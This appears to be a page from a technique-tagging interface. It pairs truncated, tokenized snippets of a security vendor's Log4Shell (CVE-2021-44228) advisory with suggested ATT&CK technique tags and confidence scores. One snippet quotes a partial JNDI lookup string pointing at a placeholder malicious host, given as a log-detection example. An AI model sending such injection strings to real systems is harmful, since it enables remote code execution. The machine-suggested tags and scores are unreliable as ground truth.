"##ndiexploit. the use of this tool by a threat actor can provide worthwhile discovery and analysis from defenders in reviewing logs — the executed commands are typically included within the url as base64 encoded text. these look like queries : $ { jndi : ldap : / / malicioushost.…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
54%
"' s happening? attackers are actively exploiting a critical vulnerability that affects a java logging package. log4j is used in a variety of different popular software by a number of manufacturers, including apple, twitter and steam. because of its large attack surface and the in…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
34%
"- report. html # a2. 16. 0 update # 4 - 12 / 13 / 2021 @ 5 : 40pm et join us on tuesday, december 14 at 1pm et for tradecraft tuesday. we ' ll team up with our industry friend and co - creator of our log4shell vulnerability tool, jason slagle, to talk about this vulnerability and…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
34%
"##pm et - updated with an invitation to join our technical deep - dive during this week ' s tradecraft tuesday episode - update # 3 - 12 / 11 / 2021 @ 11 : 30am et - updated with instructions on how to use our vulnerability tool - update # 2 - 12 / 11 / 2021 @ 1am et - updated to…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
32%
"upgrade to log4j 2. 17. 1 immediately. you should also be sure that your java instance is up - to - date. a patch for cve - 2021 - 44228 has been released, but unfortunately, we ’ re at the mercy of many of our vendors to push updates that completely patch the vulnerability. how …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
31%
"##point, which serves java code to be executed on the original victim. ultimately, this grants the adversary the opportunity to run any code they would like on the target : remote code execution. huntress researcher john hammond has recreated a proof - of - concept exploit agains…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Our team is currently investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package.